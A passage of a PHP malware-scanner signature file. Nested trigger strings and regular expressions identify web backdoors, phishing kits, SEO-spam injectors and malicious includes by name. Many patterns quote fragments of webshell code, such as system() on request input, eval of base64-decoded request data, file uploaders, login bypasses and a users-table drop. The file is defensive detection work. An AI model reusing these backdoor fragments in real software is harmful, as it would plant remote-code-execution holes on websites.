		'@include(pack(\'H*' => array(STR_CLEAR_LINEMATCH, 'php.malware.pack.003', '\@\s*include\s*\(\s*pack\s*\(\s*.H\*.\s*,\s*.\w+.\)\s*\)\s*;'),
		'x2\', \'$OO\', \'cache=00\', \'file_get_contents(' => array(STR_CLEARFILE, 'php.hacktool.file_scanner.001', NULL),
		'@include\s+"[^"]*.[\d]{3}[^\s]*.[\d]{3}[^;]*\;' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.064', '@include\s+"[^"]*.[\d]{3}[^\s]*.[\d]{3}[^;]*\;'),
		'mage($_POST[\'code\']);' => array(STR_CLEARFILE,'php.backdoor.injector.105', NULL),
		'                                                                          @include($_' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.injector.107', '\s{200}[^;]+\@include\(\$_REQUEST\[.request_\w+.\]\);'),
		'\x6d\x61\x67\x69\x63\x2e\x6a\x70\x67' => array(STR_CLEAR_MULTIMATCH, 'php.malware.redirect.002', '\$cache_key[\s]*=[\s]*".x[^;]+;[\s]*@include\(\$cache_key\);'),
	),

	'include_once' => array(STR_TRIGGER,
	
		'header("Location:' => array(STR_TRIGGER,
			'));exit();}' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.032', '<\?php\s*(\$\w{2,})=\$_GET\[.\w.\];\s*if\(\1\)\{header\(.Location:\s*.\.pack\(.H\*.\s*,\s*\1\)\);exit\(\);\}\s*[^\)]+\);\s*include_once\(..\/[^\.]+\.php.\);\s*\?><\?php\s*error_reporting[^;]+;\s*include_once\([^;]+;\s*\?>'),
			'header("Location: $secfile?email=$email")' => array(STR_CLEARFILE, 'php.phishing.generic.047', NULL),
		),

		'\x' => array(STR_TRIGGER,
			'@include_once[\s]*..x[\d]+[\w]+[^;]+;[\s]*if\(!defined\(.[^\)]+\)\)[\s]*\{[\s]*@define\(..x[\d]+[\w]+[^\)]+true\)[\s]*;[\s]*\}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.063', '@include_once[\s]*..x[\d]+[\w]+[^;]+;[\s]*if\(!defined\(.[^\)]+\)\)[\s]*\{[\s]*@define\(..x[\d]+[\w]+[^\)]+true\)[\s]*;[\s]*\}'),
			'@include_once\(..{1,8}\\\x\d+\w+' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.065', '@include_once\(..{1,8}\\\x\d+\w+[^\)]+[\W]\);'),
		),

		'class ZYH_HASHER' => array(STR_TRIGGER,
			'add_action( \'wp_loaded\', array( $this, \'check\' )' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.007', NULL),
		),

		'array( $this, \'check' => array(STR_TRIGGER,
			'self::scan(pack(\'H*\', self::checkcode));' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.007.02', NULL),
		),

		'.php\'); ?>' => array(STR_TRIGGER,
			'<?php error_reporting(-1); include_once(' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.041', '<\?php error_reporting\(-1\); include_once\([^;]+\);[\s]*\?>'),
		),

		'if(isset($_POST) && isset($_POST[' => array(STR_TRIGGER,
			'update `{$thisPreFix}options` set `option_value`=\'{$siteUrl}\' where `option_name` in(\'siteurl\',\'home\')' => array(STR_CLEARFILE, 'php.hacktool.wp_siteurl.001', NULL),
		),

		'@include_once\s*\(.(\\\\[\w]+){1,}(\\\\x[\w]+){2,}([\w]+){1,}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.033', '@include_once\s*\(.(\\\\[\w]+){1,}(\\\\x[\w]+){2,}([\w]+){1,}[^;]+\);'),
		'@include_once BP . DS . \'app\' . DS . \'etc\' .' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.magento-injector.001', '@include_once BP \. DS . .app. \. DS \. .etc[^;]+\.php["\'];'),
		'include_once JPATH_LIBRARIES.\'/joomla/base/init.php\';' => array(STR_CLEARLINE, 'php.spam-seo.Joomla-injector.003', 'include_once JPATH_LIBRARIES.\'/joomla/base/init.php\';'),
		'\@include_once\(?\s*\$_SERVER..DOCUMENT_ROOT[^;]+.wp-includes.[^;]+;' => array(REX_CLEAR_LINEMATCH, 'php.spam-seo.generic.027', '\@include_once\(?\s*\$_SERVER..DOCUMENT_ROOT[^;]+.wp-includes.[^;]+;'),
		'$wp_uri = pack("H*",' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.bean-injector.001', '\$theme_dir[\s]*=[\s]*dirname\(__FILE__\);[^\$]+\(\$theme_dir."[^<>]+?\$wp_uri = pack\("H\*"[^<>]+?include_once\(\$theme_dir.".[^"]+?\.gif".;'),
		'@include_once("wp-includes' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.generic.038', '\@include_once\(.wp-includes[^;]+\);'),
	),

	'\x' => array(STR_TRIGGER,

		'echo' => array(STR_TRIGGER,

			'require(BASE_PATH . \'wp-load.php\'' => array(STR_TRIGGER,
				'array(98,97,115,101,54,52,95,100,101,99,111,100,101)' => array(STR_CLEARFILE, 'php.backdoor.injector.123', NULL),
			),

			'<\?php[\s]*echo[\s]*"[^;]+\\\\x[\w]{2}[^}]+include[\s]*"[^;]+\\\\x[\w]{2}[^;]+;[\s]*echo[^;]+;' => array(REX_CLEARFILE, 'php.phishing.santander.003', NULL),
		),

		'include[\s]*"(\\\\x[\w]{2}|\w+)[^;]+\\\\x[\w]{2}[\w]+\\\\x[\w]{2}' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.047', '@?include[\s]*"(\\\\x[\w]{2}|[\w\/]+)[^;]+\\\\x[\w]{2}[\w\/]+\\\\x[\w]{2}[^;]+";'),
	),

	'wp_foots();' => array(STR_TRIGGER,
		'josfooter();' => array(STR_CHAIN_TRIGGER,
			'include\([^\)]+gif.\)' => array(REX_CLEAR_LINEMATCH, 'php.hacktool.SAPE.003', 'include\([^\)]+gif.\);'),
			'wp_foots()' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.SAPE.002.02', 'wp_foots\(\);'),
			'josfooter()' => array(REX_CLEAR_LINEMATCH, 'php.hacktool.SAPE.002.03', 'josfooter\(\);'),
		),
	),

	'=dirname(__FILE__);' => array(STR_TRIGGER,

		'X-T@MPER V8. */' => array(STR_TRIGGER,
			'$codelock_enc="Antibots.php"; $codelock_' => array(STR_CLEARFILE, 'php.phishing.paypal.012', NULL),
		),

		'$codelock_enc=' => array(STR_TRIGGER,
			'JHVybDliID0gJG' => array(STR_CLEARFILE, 'php.backdoor.uploader.257', NULL),
		),
	),

	'include(\'../' => array(STR_TRIGGER,

		'include(\'../wp-config.php\');' => array(STR_TRIGGER,
			'UPDATE $table SET post_content=\'$newCode\', post_title=\'$newTitle\' WHERE id=$id' => array(STR_CLEARFILE, 'php.backdoor.db_shell.004', NULL),
		),
		
		'<?=$language[' => array(STR_CLEARFILE, 'php.phishing.script.030', NULL),
	),

	'include(\'blocker.php\');' => array(STR_TRIGGER,
		'<title' => array(STR_CLEARFILE, 'php.phishing.script.009', NULL),
		'function getc($string)' => array(STR_CLEARFILE, 'php.phishing.script.011', NULL),
	),

	'/cron.php\');' => array(STR_TRIGGER,
		'.\'/wp-admin/includes/get.php\');' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.do_backdoor.002', '\@include_once.._SERVER..DOCUMENT_ROOT...\..\/wp-admin\/includes\/get.php..;\@include_once[^\)]+\);'),
		';$root_path = substr($absolutepath,' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.do_backdoor.003', '\$localpath = getenv..SCRIPT_NAME..;\$absolutepath[^\/]+;include..root_path\..\/libraries\/joomla\/application\/get.php..;include[^\)]+\);'),
	),

	'include(TEMPLATEPATH.\'/login.php\');' => array(STR_TRIGGER,
		'$ip_real=ip2int(getenv(\'REMOTE_ADDR\'));' => array(STR_TRIGGER,
			'$ip["ip_name"][]="northernlight";' => array(STR_CLEARFILE, 'php.hacktool.SAPE.001.06', NULL),
		),
	),

	'_bb_press_plugin.class.php' => array(STR_TRIGGER,
		'add_filter(\'plugin_action_links' => array(STR_CLEARFILE, 'php.spam-seo.fake_plugin.005.03', NULL),
	),

	'<?php include (\'./' => array(STR_TRIGGER,
		'<?php $pill = \'' => array(STR_CLEARFILE, 'html.spam-seo.pharma-site.003', NULL),
	),

	'include("temp' => array(STR_TRIGGER,
		'=str_replace("[t1]", "<?' => array(STR_CLEARFILE, 'php.malware.obfuscated.013', NULL), 
	),

	'unlink(ABSPATH."' => array(STR_TRIGGER,
		'$wpdb->query("DROP TABLE ".$wpdb->prefix."users");' => array(STR_CLEARFILE, 'php.malware.db_drop.001', NULL), 
	),

	'*/include ' => array(STR_TRIGGER,
		'*/"\x2' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.012.02', '(?<=\*\/)include[\s]*\/\*[^;]+?\*\/[\s]*".x2[^"]+";'),
	),

	'.png"); die;' => array(STR_TRIGGER,
		'include(dirname(__FILE__)."/wp-' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.026', '@?include\(dirname\(__FILE__\)\.".wp-[^)]+\.png"\); die;'),
	),

	'if (is_file(' => array(STR_TRIGGER,
		'if \(is_file\([\'"][^\)]+[\'"]\)\)[ ]*\{?[ ]*include(_once)?\([\'"][^\)]+[\'"]\);[\s]*\}?' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.054', 'if \(is_file\([\'"][^\)]+[\'"]\)\)[ ]*\{?[ ]*include(_once)?\([\'"][^\)]+[\'"]\);[\s]*\}?'),
	),

	'###### ####### ##      ##      #######  #######       #### #### ####### ##     ##   ######   ########' => array(STR_TRIGGER,
		'##     ##   ## ##      ##      ##   ## ##             ## ### ## ##   ## ##     ##   ##    ##    ##' => array(STR_CLEARFILE, 'php.phishing.fmd.001', NULL),
	),

	'anti' => array(STR_TRIGGER,
		'include[^\w][^;\n]{0,20}[\'"\/]anti[^;\n]*\.php' => array(REX_CLEARFILE, 'php.phishing.script.002', NULL),
	),

	'RewriteCond %{REQUEST_FILENAME} !wp-include.php' => array(STR_CLEAR_MULTIMATCH, 'htaccess.spam-seo.injector.045', '<IfModule mod_rewrite.c>[\\s]*RewriteEngine On[\\s]*RewriteCond %.HTTP_USER_AGENT.[^<]+!wp-include.php[^<]+wp-include.php -f[^<]+wp-include.php .L][\\s]*<.IfModule>'),
	'<?php include(\'_links.php\'); ?><!DOCTYPE html>' => array(STR_CLEARFILE, 'php.spam-seo.injector.080', NULL),
	'if(!function_exists(\'rss_dlbak\')){' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.injector.050', 'if..function_exists..rss_dlbak[^}]+}[\\s]*}[\\s]*function wp_botton[^>]+function include_getcachebakbak[^<]+< 100[^>]+return.\\$f.;[\\s]*}'),
	'define (\'streamset\', tempnam' => array(STR_CLEAR_MULTIMATCH, 'php.spam-seo.streamset_mysql.001', 'if\s*.\!defined..streamset...\{\s*define\s*..streamset., tempnam\s*.ini_get\s*..session[^\}]+?\}\s*\$stream_c[^\}]+?\@include[^\@]+?\@unlink\s*.streamset.;\s*\}'),
	'include "./wp-admin/headers' => array(STR_CLEAR_LINEMATCH, 'php.spam-seo.stylesshets_com.005', '\@?include ".\/wp-admin\/headers\/[^"]+";'),
	'<?php if(BlockForUsersNotForSearchEngine()):?>' => array(STR_CLEARFILE, 'php.spam-seo.injector.033', NULL),
	'var page = "./Login?For=Start=LOG <?php include' => array(STR_CLEARFILE, 'php.phishing.generic.016', NULL),
	'PRIVATE  PpL SCAMA  2015' => array(STR_CLEARFILE, 'php.phishing.generic.017', NULL),
	'<?php include \'random.php\'; echo $randomise; ?>"' => array(STR_CLEARFILE, 'php.phishing.generic.018', NULL),
	'include("fmob2.html");' => array(STR_CLEARFILE, 'php.phishing.freemobs.002', NULL),
	'<title>Mass Inbox Mailer v2.0</title>' => array(STR_CLEARFILE, 'php.hacktool.mass-inbox-mailer-2-0.001', NULL),
	'header(\'Location: http://bilgialma.co' => array(STR_CLEARFILE, 'php.spam-seo.redirect.045.03', NULL),
	'Network host configuration. Not recommended edit this code!' => array(STR_CLEAR_MULTIMATCH, 'php.malware.include.034', '\/\/\s*Network host configuration\. Not recommended edit this code!\s*@?include\s*\(\s*ABSPATH[^;]*?;'),
	'/wp-includes/SimplePie/HTTP/tmp/jquery.php\'' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.039', '@include\s+["\']\/?(?:[^;\/]+?\/){2,5}wp-includes\/SimplePie\/HTTP\/tmp\/jquery\.php["\']\s*;'),
	'include \'./tiao.php\'' => array(STR_CLEARFILE, 'php.spam-seo.injector.185', NULL),
	'if\s*\(is_file\([\'"]((?:\/\w+){1,8}\/wp-content\/plugins\/[\w+(?:\/\-\w+)?]+\.(?:php|html|htm|js|.pl|.sh)[\'"]\))\)\s*\{include_once\([\'"]\1\s*;\s*\}' => array(REX_CLEAR_MULTIMATCH, 'php.malware.include.038', 'if\s*\(is_file\([\'"]((?:\/\w+){1,8}\/wp-content\/plugins\/[\w+(?:\/\-\w+)?]+\.(?:php|html|htm|js|.pl|.sh)[\'"]\))\)\s*{include_once\([\'"]\1\s*;}'),
	'include\(.\/tmp\/\w+.\)\s*;' => array(REX_CLEAR_LINEMATCH, 'php.malware.include_tmp.001', 'include\(.\/tmp\/\w+.\)\s*;'),
	'return symlink(readlink($source), $HtaccessSouRce);' => array(STR_CLEARFILE, 'php.phishing.script.013', NULL),
	'XBOOMBER_check.php' => array(STR_CLEARFILE, 'php.phishing.generic.071', NULL),
	'include\([\'"][^;]+\/BOT[S_][^;]+\.php' => array(REX_CLEARFILE, 'php.phishing.include.001', NULL),
	'<? echo($language[' => array(STR_CLEARFILE, 'php.phishing.script.031', NULL),
	'include(\'sucuri-' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.007', '<\?php\s+if \(is_file\(.sucuri-\w+.php[^\?]+include\(.sucuri-[^\)]+\);\?>'),
),

'REQUE' => array(STR_TRIGGER,

	'isset' => array(STR_TRIGGER,

		'isset($_REQUEST[' => array(STR_TRIGGER,
	
			'if (!isset($_REQUEST[' => array(STR_TRIGGER,
		
				'$_SERVER[\'HTTP_USER_AGENT\'] = \'\';' => array(STR_TRIGGER,
					'unset($_SERVER[\'HTTP_X_FORWARDED_FOR\']);' => array(STR_CLEAR_MULTIMATCH, 'php.malware.component.004', 'if[\\s]\\(!isset\\(\\$_REQUEST\\[[^{]+\\{[\\s]*if[\\s]*\\(!empty\\(\\$_SERVER\\[.HTTP_USER_AGENT[^{]+\\{[\\s]*if[\\s]*\\(preg_match...O.:[^;]+HTTP_USER_AGENT.][\\s]*=[\\s]*[\'"]{2};[^;]+unset.\\$_SERVER..HTTP_X_FORWARDED_FOR...;[^;]+die\\(\\);[\\s]*}[\\s]*}'),
				),
		
				'new RecursiveIteratorIterator(new RecursiveDirectoryIterator($' => array(STR_TRIGGER,
					'file_put_contents($file->getPathname()' => array(STR_CLEARFILE, 'php.malware.injector.071', NULL),
				),
			),

			'");if(isset($_REQUEST["' => array(STR_TRIGGER,
				'".php_uname()."' => array(STR_TRIGGER,
					'"])){@ini_set("' => array(STR_TRIGGER,
						'"])){move_uploaded_file($_FILES["' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.uploader.357', '\$\{"[^\}]+\}\["[^\]]+\][\s]*=[\s]*"[^"]+";[\s]*\$\{[^\}]+\}\["[^\]]+\][\s]*=[\s]*"[^"]+";[\s]*unlink\([^;]+\);[\s]*if\(isset\(\$_REQUEST[^\?]+\$_FILES\["[^\]]+\]\[[^\]]+\];[\s\}]+'),
					),
				),
			),

			'wp_set_current_user' => array(STR_TRIGGER,
				'get_user_by' => array(STR_TRIGGER,
					'])){$user = get_user_by( \'id\', $_REQUEST' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.wp_login.002', 'if *\(isset[^=]+= *get_user_by\([^\{]+\{ *wp_set_current_user\([^;]+; *wp_set_auth_cookie[^;]+; *do_action\( *["\']wp_login[^;]+;\}*'),
				),
			),
	
			']) && array_map(' => array(STR_TRIGGER,
				'",(array)$_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.assert.025', 'isset\(\$_REQUEST\[[^\]]+\]\) && array_map\([^,]+,\(array\)\$_REQUEST\[[^\]]+\]\);'),
			),
	
			'"]($_REQUEST["c"]);' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.012', 'if\(isset\((\$_REQUEST\[\"[\w]+\"])\)\)[\s]*\{?[\s]*\1\(\$_REQUEST.\"c\"]\);([\s]*[Ee]xit;[\s]*\}[\s]*;)?'),
			'isset($_REQUEST[\'c\']) && $_REQUEST[\'c\']==\'user' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.joomla-superuser.002', 'if.isset.._REQUEST..c... && ._REQUEST..c..==.user[^<]+Super Administrator.,.25..";[^<]+database->query..;[\\s]*}[\\s]*}'),
			'if(isset($_REQUEST[\'zalivka\'])) {' => array(STR_CLEARFILE, 'php.backdoor.uploader.035', NULL),
			'@preg_replace(\'/(.*)/e\', @$_REQUEST[\'' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.pregreplace.015', 'if[\s]*\(!?isset\(\$_REQUEST[^@]+@preg_replace[^@]*@\$_REQUEST[^}\n]+\);[^\}\n\?]*\}?'),
			'=Array(\'\' .\'preg_repla\' .\'ce\'); ' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.pregreplace.017', '(?:\/\*[^\*]+\*\/)?if\(\!function_exists\(.\w+.\)[^\$]+\$GLOBALS\[.\w+.\]\s*\=\s*Array\(..\s*\..preg_repla.\s*\..ce.\)\;\s*.function\s*\w+\(\$\w+\)\{\$\w+\s*=\s*Array\(.\w+.\,..\(\.\*\).e.\,.\w+.\,..\);return\s*\$\w+\[\$\w+\];\}if\(\@isset\(\$_REQUEST\[\w+\(\d+\)\]\)[^\@]+\@\$GLOBALS\[.\w+.\]\[\d+\]\(\w+\(\d+\)\,\$_REQUEST\[\w+\(\d+\)\]\,\w+\(\d+\)\)\;exit\;(?:\/\*[^\*]+\*\/)?\}(?:\/\*[^\*]+\*\/)?\}?'), //Improved by Fio
			'as"."se"."rt' => array(STR_CLEAR_LINEMATCH, 'php.malware.assert.011', 'if[^\$]+\$_REQUEST\[[^\]]+\][^\$]+\$\w+\s*[^\'"]+.as...se...rt.;[^\[]+\[.\w+.\]\).[^;]+;([^\}]+\})?'),
			'&& fetch_feed($_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.hacktool.feed_url.001', 'isset\(\$_REQUEST\[[\'"]\w+[\'"]\]\)\s*&&\s*fetch_feed\(\$_REQUEST\[[\'"]\w+[\'"]\]\);'),
			'\]\)\){\@?include\(' => array(REX_CLEAR_LINEMATCH, 'php.malware.include.050', 'if\(isset\(\$_REQUEST\[.\w+.\]\)\)\s*{\s*\@?include\(.[\/\w]+.\)\s*;(?:\s*exit;)?\s*}'),
			'])) { @extract($_REQUEST); $' => array(STR_CLEAR_LINEMATCH, 'php.malware.extract.003', 'if[\s]*\(isset[\s]*\(\$_REQUEST\[.[\w]+.\]\)\)[\s]*\{[\s]*@extract\(\$_REQUEST\);[\s]*\$[\w]+\(\$[\w]+\);[\s]*\}'),
		),

		'echo' => array(STR_TRIGGER,

			'$uploaddir.basename($_FILES[\'uploadfile\'][\'name\']);' => array(STR_TRIGGER,
				'enctype=.?multipart\/form-data' => array(REX_TRIGGER,
					'(copy($_FILES[' => array(STR_CLEARFILE, 'php.backdoor.uploader.365', NULL),
				),
			),

			'"]($_REQUEST["\x44\x61\x74\x61\x62\x61\x73\x65"]):' => array(STR_TRIGGER,
				'"]($_REQUEST["\x57\x6f\x72\x64\x50\x72\x65\x73\x73"]):' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.create_function.028', '\$[0O_]+[\s]*=[\s]*\(?.[^;]+\)?;[\s]*\$[\w]+[\s]*=[\s]*(\$[\w]+\{[\d]+\}[\s]*\.[\s]*)+\$[^\n]+\]\(\);[\s]*(\/\/[\w\s_-]+)?'),
			),

			'\'],); array_filter($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.array_filter.002', 'echo[^\(]+\(isset\(\$_REQUEST\[.\w+.\]\)\)\s*\{\s\$\w+\s*=\s*\$_REQUEST\[.\w+.\];\s*\$\w+\s*\=\s*array\(\$_POST\[.\w+.\],\);\s*array_filter\(\$\w+,\s*\$\w+\);\s*}'),
			'if(preg_match("/googlebot|slurp|msnbot|bingbot/i", getenv("HTTP_USER_AGENT")' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.074', NULL),
		),

		'system(' => array(STR_TRIGGER,

			'system($_REQUEST[$cmd]);' => array(STR_TRIGGER,
				'?><?php $cmd = <<<EOD' => array(STR_CLEARFILE, 'php.backdoor.system.017', NULL),
			),

			'if[\s]*\([\s]*isset[\s]*\([\s]*\$_REQUEST\[[^{]+\{[\s]*system\([\s]*\$_REQUEST' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.system.013', 'if[\s]*\([\s]*isset[\s]*\([\s]*\$_REQUEST\[[^{]+\{[\s]*system\([\s]*\$_REQUEST[^}]+;[\s]*\}'),
		),

		'if (preg_match("/\'DB_HOST' => array(STR_TRIGGER,
			'} while (strpos($headers, "\r\n\r\n") === false);' => array(STR_CLEARFILE, 'php.hacktool.database-manager.002', NULL),
		),

		'echo "#Failed: $post_link#' => array(STR_TRIGGER,
			'print "#Created post_id: !$post_id!$link!#\n";' => array(STR_CLEARFILE, 'php.spam-seo.injector.236', NULL),
		),

		'="pr"."eg"."_r"."ep"."la"."ce";' => array(STR_CLEAR_LINEMATCH, 'php.malware.assert.011.05', '(?:\/\*[^\*]+\*\/)?if(?:\/\*[^\*]+\*\/)?\(isset(?:\/\*[^\*]+\*\/)?\([^_]+_REQ[^\$]+\$\w+[^;]+;[^_]+_REQUES[^\[]+\[.\w+.\][^;]+;(?:\/\*[^\*]+\*\/)?exit;(?:\/\*[^\*]+\*\/)?\}'),
		'$ratel->init($ruri, $host, $is_bot);' => array(STR_CLEARFILE, 'php.spam-seo.doorway-gen.062', NULL),
		'.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28' => array(STR_CLEARFILE, 'php.backdoor.eval_preg_replace.004.02', NULL),
		'](\'$_\',$_REQUEST[\'FILE\'].\'($_);\'); $_FILE(stripslashes($_REQUEST[' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.045', 'if[\s]*\(isset\(\$_REQUEST\[.FILE.\]\)\)\{[\s]*\$_FILE[\s]*=[\s]*\$_REQUEST\[[^\]]+\]\(.\$_.,\$_REQUEST\[[^;]+\(\$_\);[^}]+\}'),
		'if (in_array($symbols, $vars' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.array_filter.003.02', 'if\s*\(\!function_exists\([\'"](\w+)[\'"]\)\)\s*:\s*(?:\/[^\/]+\/\s*)?function\s*\1\((\$\w+)\)\s*{\s*(\$\w+)\s*=[^;]+;\s*if\s*\(in_array\(\3,\s*\2\s*,\s*true\)\)\s*{\s*if\s*\(isset\(\2\[.\w+.\]\)\)\s*\2\[[^;]+;\s*(?:\$\w+\s*=\s*\2\[.\w+.\]\s*\(\2[^;]+;\s*)?return\s*str_replace\([^\$]+\$\w+[^;]+;\s*}\s*}\s*endif;\s*(?:\n\s*\/\/[\s\w\-]+\n)?(\$\w+)\s*=\s*\$_REQUEST\s*;\s*unslash\(\4\)\s*;'),
		'if[\s]*\(isset[\s]*\(\$_REQUEST\[.[\w]+.\]\)[\s]*&&[\s]*md5[\s]*\([\s]*\$_REQUEST\[.[\w]+.\]\)[\s]*==[\s]*.[\w]{20,}.[\s]*&&[\s]*isset[\s]*\([\s]*\$_REQUEST\[.[\w]+.\]\)\)[\s]*eval' => array(REX_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.050', 'if[\s]*\(isset[\s]*\(\$_REQUEST[\s]*\[[^&]+&&[\s]*md5[^&]+&&[\s]*isset[\s]*\([\s]*\$_REQUEST[\s]*\[.\w+.\]\)\)[\s]*eval[\s]*\([\s]*base64_decode[\s]*\([\s]*\$_REQUEST[\s]*\[.\w+.\][\s]*\)[\s]*\);'),
		'${\'\'.\'_REQUEST\'}; if (isset($' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.request.008', '\$[\w]+=\$\{..\.._REQUEST.\};[\s]*if[\s]*\(isset\(\$[\w]+\[.[\w]+.\]\)\)[\s]*\{[\s]*\$[\w]+[\s]*=[\s]*\$[\w]+\[.[\w]+.\];[\s]*\$[^,]+\]\),\$[\w]+\(\$[^;]+\]\)\);[\s]*\$[\w]+\(\$[\w]+\(\$[\w]+\[.[\w]+.\]\)\);'),
		'$isInj=file_put_contents($file->getPathname(),$str,LOCK_EX);' => array(STR_CLEARFILE, 'php.backdoor.uploader.381', NULL),
		'(strpos(strtolower($_SERVER["HTTP_USER_AGENT"]),"googlebot") !==' => array(STR_CLEAR_LINEMATCH, 'php.malware.include.069', 'if.\(strpos\(strtolower\(\$_SERVER\[\"HTTP_USER_AGENT\"\]\),\"googlebot\"\).\!==.false.or.[^@]*@include\(\$\w+...\"\/wp-\w+[^;]*;\}'),
	),

	'This code use for global bot statistic' => array(STR_TRIGGER,
		'if (!isset($sRetry))' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.curl.001', 'if\s+\(!isset\(\$sRetry\)\)[^>]+\$sRetry\s*=\s*1;[^>]+if\(\(strstr\(\$sUser[^>]+curl_close\(\$stCurl[^>]+\}'),
		'/*This code use for global bot statistic*/' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.curl.001.04', '\/\*This code use for global bot statistic\*\/\s+\$sUserAgent[^>]+?reate bot analitics[^>]+?\(.sReferer..;\s*\}\s*[^\/]*?\/\*Statistic code end\*\/'),
		'if ( $stCurlHandle !== NULL )' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.curl.001.02', '\/\/\s*This code use for global bot statistic\s+\$sUserAgent[^>]+if.{2,3}str(str|pos)..sUserAgent[^>]+curl_close..stCurlHandle.;[\s]*\}'),
		'echo file_get_contents(\'http' => array(STR_CLEAR_MULTIMATCH,'php.backdoor.curl.001.03', '\/\/\s*This code use for global bot statistic\s+\$sUserAgent[^>]+google serch bot\s+if[^>\{]+\{[^\}\{]+\}(\s*else\s*\{[^\}\{]+\})?'),
	),

	'array_keys($_REQUEST' => array(STR_TRIGGER,

		'current(array_keys($_REQUEST)),-2,1)) -' => array(STR_TRIGGER,
			'strrev(STR_PROGRESS_CONSTANT' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.request_keys.001', 'foreach.\$_REQUEST[^\)]+\)\s*if.ord.substr.current.array_keys.._REQUEST..,-1.. -[^\{;]+\{\s*define[^\}]+\$value\)\);\s*\}'),
			'$SERVER_UNIQUE_LOAD_BALANCE(current' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.request_keys.002', '\$SERVER_UNIQUE_LOAD_BALANCE = strrev[^;]+\);\s*if.ord.substr.current.array_keys.._REQUEST..,-1.. -[^\{;"]+\)\s*preg_replace\([^;]+_BALANCE\(current.._REQUEST\)\)\);'),
		),

		'header(\'Location:' => array(STR_TRIGGER,
			'$tr = @array_keys($_REQUEST)[0];' => array(STR_CLEARFILE, 'php.backdoor.request_keys.003.002', NULL),
		),
	),

	'.@$_($_REQUEST[' => array(STR_TRIGGER,

		'if(md5(@$_COOKIE[' => array(STR_TRIGGER,
			']).@$_($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.eval_COOKIE.005', NULL),
		),

		']) ($_=@$_REQUEST[q]).@$_($_REQUEST[' => array(STR_CLEARFILE, 'php.backdoor.eval_REQUEST.007', NULL),
		']).@$_($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.generic.045.06', '<\?php[\s]*if\(isset\(\$_(GET|REQUEST)\[[^\]]+\]\)\)[\s]*\{[^>]+@\$_\(\$_REQUEST[^>]+\?>'), //modified by PG to cover variants
	),

	'@array_filter($sort, $array);' => array(STR_CHAIN_TRIGGER,
		'array($_REQUEST[\'sort\']);' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.array.003', '\{[\s]*\$array[\s]*=[\s]*[^;]+\$_REQUEST\[.array.\];[\s]*\$sort[\s]*=[\s]*array[^;]+\);[\s]*@array_filter[^;]+\);[\s]*(echo[^;]+;[\s]*exit[^;]*;)?[\s\}]*'),
		'if(isset($_REQUEST["array"]))' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.array.003.02', 'if.isset.\$_REQUEST."array".\)\)'),
	),

	'if (!empty($_REQUEST[' => array(STR_TRIGGER,

		'(\'\', @$' => array(STR_TRIGGER,
			'= strrev($_REQUEST[' => array(STR_CLEAR_MULTIMATCH, 'php.backdoor.eval_REQUEST.013', '(\\$[\\w]+[\\s]*=[\\s]*[a-z64_\\.\'"\\s]+;[\\s]*)+if[\\s]*.!empty.\\$_REQUEST\\[[^{]+{[\\s]*\\$[\\w]+[\\s]*=[\\s]*strrev\\(\\$_REQUEST\\[[^;]+;[\\s]*\\$[\\w]+[\\s]*=[\\s]*@\\$[\\w]+\\(.., @\\$[\\w]+\\(\\$[\\w]+\\)\\);[\\s]*\\$[\\w]+\\(\\);[\\s]*}'),
		),

		'@$decode($reverse($_REQUEST[$auth]))' => array(STR_CLEARFILE, 'php.backdoor.create_function.011', NULL),
	),

	'=${\'_REQUEST\'}' => array(STR_TRIGGER,
		'}!=${' => array(STR_TRIGGER,
			'(@${"' => array(STR_TRIGGER,
				'"})?@${"' => array(STR_CLEAR_LINEMATCH, 'php.backdoor.eval_REQUEST.020', '\$[\w]+=\$\{._REQUEST.\}[\s]*;[^;]+"\}!=\$\{"[^;]+\}\)\?\@\$\{"[^;]+;'),
			),
		),
	),

